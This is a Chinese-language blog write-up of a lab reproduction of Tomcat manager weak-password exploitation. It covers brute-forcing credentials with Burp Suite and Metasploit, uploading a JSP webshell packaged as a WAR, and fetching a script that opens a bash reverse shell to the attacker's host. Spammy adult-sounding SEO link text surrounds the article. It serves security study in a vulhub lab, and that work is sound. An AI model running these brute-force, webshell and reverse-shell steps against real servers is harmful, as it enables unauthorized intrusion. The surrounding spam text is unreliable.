成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久

您的位置:首頁技術文章
文章詳情頁

Tomcat弱口令復現及利用(反彈shell)

瀏覽:338日期:2023-03-19 16:52:04
目錄
  • 漏洞描述
  • 復現
    • 環境
    • 攻擊流程
  • 利用
    • msf利用
    • 反彈shell利用
  • 參考文章

    漏洞描述

    Tomcat有一個管理后臺,其用戶名和密碼在Tomcat安裝目錄下的conf\tomcat-users.xml文件中配置,不少管理員為了方便,經常采用弱口令。Tomcat 支持在后臺部署 war 文件,可以直接將 webshell 部署到 web 目錄下。其中,欲訪問后臺,需要對應用戶有相應權限。
    Tomcat7+ 權限分為:
    manager(后臺管理)

    manager-gui 擁有html頁面權限
    manager-status 擁有查看status的權限
    manager-script 擁有text接口的權限,和status權限
    manager-jmx 擁有jmx權限,和status權限
    host-manager(虛擬主機管理)

    admin-gui 擁有html頁面權限
    admin-script 擁有text接口權限
    二、漏洞影響
    Tomcat <= 6.0.0 默認用戶名為admin,密碼為空,無暴力破解限制。
    Tomcat >= 6.0.0 無默認用戶,五次失敗后,賬戶即被鎖定。
    但是正常安裝的情況下,tomcat8 中默認沒有任何用戶,且 Manager 頁面只允許本地 IP 訪問。只有管理員手工修改了這些屬性的情況下,才可以進行攻擊。

    復現

    環境

    一臺攻擊機(kali-2021)192.168.141.190
    受害機(vulhub搭建的)192.168.141.194
    一臺用來下載反彈shell腳本的服務器(內網,如果有服務器更好)192.168.141.128(利用時讓受害主機下載shell文件實現反彈shell)

    攻擊流程

    按照前人經驗可以使用burpsuite進行爆破或者使用msf進行爆破
    首先是根據burpsuite進行爆破:
    抓取請求數據包可以看到

    =其中沒有看到熟悉的賬號密碼,但是其中’Authorization: Basic dG9tY2F0OnRvbWNhdA=='將其中的base64字符串解密可以看到結果格式為"tomcat:tomcat"所以將請求包送至爆破模塊,構造格式為x:x的payload

    結果中的200即為成功,但是前面說明了tomcat8或有防爆破機制,當一個用戶名登錄超過五次就會鎖定賬戶,網上有說要用"tomcat暴破圖形化—繞過tomcat 6/7/8的防暴破機制"這個腳本來繞過但是作者沒有找到免費的,就不測試了.
    其次使用過msf進行爆破

    msf中找到上面的模塊配置出options的rhosts和rport就可以進行爆破(run)了

    可以看到用戶名和密碼在都是tomcat的時候爆破成功,而且可以看到msf應該是自帶了繞過防爆破腳本,而且可以通過自定義user和password文件進行測試,所以作者更推薦使用msf爆破方式

    利用

    msf利用

    這里強調一下,在作者復現網上說的使用exploit/multi/http/tomcat_mgr_deploy但是在配置好rhoss和rport進行run的時候出現無法拿到shell問題

    所以作者使用了exploit/multi/http/tomcat_mgr_upload進行利用配置同deploy,配置httpusername,httppassword,rhosts.rport 然后運行拿到shell

    反彈shell利用

    整體思路:首先在網頁端登錄進管理后臺上傳jsp后門文件,然后訪問這個jsp后門即可,雖然上傳之后就可以通過shell軟件控制,但是為了復習反彈shell的過程,作者將進一步通過上傳的jsp一句話木馬(也可以上傳大馬)進行反彈shell.

    首先將一句話shelloneword.jsp(一句話木馬文件)通過命令,jar cvf shelloneword.war shelloneword.jsp 執行成功后在管理后臺找到如下然后上傳

    成功之后可以在這看到結果

    之后通過各種軟件訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i= xxxx就行了

    但是作者的方式是通過讓受害主機訪問服務器主機下載shell文件,進行反彈shell,所以前面只是中間過程,首先讓受害主機執行i=curl -o /shell.sh http://192.168.141.128/shell.txt 其中shell.txt文件內容為

    bash -i >& /dev/tcp/192.168.141.190/7777 0>&1

    將ip和端口改為自己的,然后打開nc 監聽7777端口,訪問http://192.168.141.194:8080/shelloneword/shelloneword.jsp?i=bash /shell.sh

    反彈shell成功

    參考文章

    [1] https://blog.csdn.net/qq_33020901/article/details/98357659
    [2] https://blog.csdn.net/weixin_44037296/article/details/116376114
    [3] https://blog.csdn.net/qq_43665434/article/details/116903953
    [4] https://www.cnblogs.com/henry666/p/14379888.html
    [5]https://www.cnblogs.com/qianxinggz/p/13440366.html
    [6]https://blog.csdn.net/weixin_42432317/article/details/90208213

    到此這篇關于Tomcat弱口令復現及利用(反彈shell)的文章就介紹到這了,更多相關Tomcat弱口令復現內容請搜索以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持!

    標簽: Tomcat
    成人在线亚洲_国产日韩视频一区二区三区_久久久国产精品_99国内精品久久久久久久
    精品亚洲porn| 亚洲另类一区二区| 国产最新精品精品你懂的| 国产日韩1区| 国产精品美女一区二区三区| 国产麻豆精品一区二区| 久久久久久久久久久久久久一区| 中文字幕一区三区| 91麻豆自制传媒国产之光| 日韩一区二区影院| 国产精品一区三区| 中文字幕在线免费不卡| 欧美精品一区男女天堂| 激情伊人五月天久久综合| 午夜宅男久久久| 亚洲成在人线免费| 国产伦精品一区二区三区视频黑人 | 极品少妇一区二区三区| www国产成人| 不卡av电影在线播放| 日韩欧美一级二级三级| 国产成人av一区二区三区在线 | 成人福利视频在线| 精品国产sm最大网站| 日韩视频免费直播| 国产91清纯白嫩初高中在线观看| 99精品99| 蜜乳av一区二区| 成人av在线看| 国产亚洲精品超碰| 欧美日韩国产在线一区| 国产精品久久久久久久久晋中 | 羞羞答答国产精品www一本| 亚洲国产精品天堂| 欧美在线视频你懂得| 极品美女销魂一区二区三区免费| 在线播放亚洲一区| av电影在线观看不卡| 久久久久久久网| 亚洲视频欧美在线| 亚洲一二三区视频在线观看| 久久久亚洲一区| 黑人巨大精品欧美黑白配亚洲| 欧美色综合网站| 成人激情午夜影院| 成人免费在线视频观看| 久久aⅴ国产紧身牛仔裤| 美腿丝袜亚洲色图| 日韩免费看的电影| 狠狠入ady亚洲精品| 亚洲国产视频网站| 成人免费视频视频在线观看免费| 国产精品亚洲成人| 26uuu精品一区二区| 亚洲精品乱码| 天天色图综合网| 在线电影欧美成精品| 91在线观看美女| 亚洲老妇xxxxxx| 精品污污网站免费看| 成人福利视频在线| 亚洲黄色小说网站| 9191久久久久久久久久久| 色综合中文字幕国产 | 播五月开心婷婷综合| 亚洲精品少妇30p| 欧美性三三影院| 你懂的成人av| 天堂在线亚洲视频| 26uuuu精品一区二区| 国产一区二区中文| av成人免费在线观看| 1024国产精品| 91婷婷韩国欧美一区二区| 亚洲精品免费在线| 欧美日韩成人一区| 欧美三日本三级少妇三99| 三级欧美韩日大片在线看| 精品国产1区二区| 亚洲一区三区视频在线观看| 韩国av一区二区三区四区| 中文字幕在线观看不卡| 欧美性做爰猛烈叫床潮| 欧美日韩一区二区视频在线观看 | 国产欧美久久久精品影院| 在线视频国产一区| 极品日韩久久| 高清av一区二区| 日韩精品国产欧美| 国产精品色眯眯| 3d动漫精品啪啪一区二区竹菊 | 色综合网站在线| 日韩一级在线| 伊人蜜桃色噜噜激情综合| 亚洲国产一区二区在线| 久久无码av三级| 久久这里有精品15一区二区三区| 99精品黄色片免费大全| 久久国产精品72免费观看| 国产精品短视频| 精品88久久久久88久久久| 欧美性色黄大片手机版| 日韩亚洲国产精品| 欧美日本国产| 豆国产96在线|亚洲| 老司机精品视频导航| 一区二区成人在线视频| 国产欧美精品在线观看| 日韩欧美亚洲另类制服综合在线| 久久精品一二三区| 国产日韩欧美一区二区| 欧美在线网站| 波多野结衣一区二区三区| 国产一区免费视频| 国产iv一区二区三区| 青青草原综合久久大伊人精品优势| 国产精品的网站| 日本一区二区三区视频视频| 国产成人av电影在线播放| 国产精品天美传媒沈樵| 久久精品一区| 国产精品推荐精品| 永久91嫩草亚洲精品人人| 欧美日韩hd| 91啪亚洲精品| eeuss影院一区二区三区| 高清不卡一区二区| 国产精品一区久久久久| 激情综合网最新| 老司机精品视频线观看86| 日本免费新一区视频| 免费观看91视频大全| 日韩电影在线一区二区三区| 午夜国产精品一区| 午夜影院久久久| 亚洲6080在线| 日韩不卡一区二区三区| 舔着乳尖日韩一区| 日韩成人午夜电影| 久久国产精品99久久人人澡| 久久99久久99小草精品免视看| 日韩在线观看一区二区| 蜜臀久久99精品久久久画质超高清 | 欧美日韩一级大片网址| 欧美三级视频在线| 9191久久久久久久久久久| 日韩视频一区二区三区 | 91精品国产综合久久精品性色| 欧美在线色视频| 7777精品久久久大香线蕉| 欧美一卡二卡在线观看| 精品日韩一区二区三区免费视频| 亚洲精品一线二线三线无人区| 久久亚洲综合av| 国产精品国产三级国产有无不卡| 成人欧美一区二区三区1314| 亚洲一区二区三区视频在线播放| 一区二区高清视频在线观看| 日产欧产美韩系列久久99| 精品制服美女久久| 成人久久视频在线观看| 色综合色狠狠天天综合色| 亚洲国产精品日韩| 美女国产一区| 欧美一区二区三区视频免费播放| 久久久五月婷婷| 亚洲另类色综合网站| 日本午夜精品视频在线观看| 国产精品123区| 国模一区二区三区| 美玉足脚交一区二区三区图片| 欧美日韩综合在线| 久久女同互慰一区二区三区| 亚洲欧美日韩一区二区三区在线观看| 午夜精品福利一区二区蜜股av| 九九精品视频在线看| 色综合久久中文字幕综合网 | 欧美精品偷拍| 久久亚洲不卡| 欧美精品一区男女天堂| 亚洲精品中文字幕乱码三区| 蜜桃视频第一区免费观看| yourporn久久国产精品| 亚洲免费黄色| 欧美一区二区日韩一区二区| 亚洲色图欧美激情| 久久99热狠狠色一区二区| 欧美jizzhd精品欧美巨大免费| 国产精品亚洲综合久久| 欧美一区二区福利在线| 亚洲欧美在线高清| 韩国成人福利片在线播放| 影音先锋久久精品| 欧美日韩一区二区在线视频| 国产欧美日韩精品一区| 日韩中文字幕91| 欧美日韩国产色综合一二三四| 看欧美日韩国产| 国产精品人妖ts系列视频 | 亚洲特黄一级片|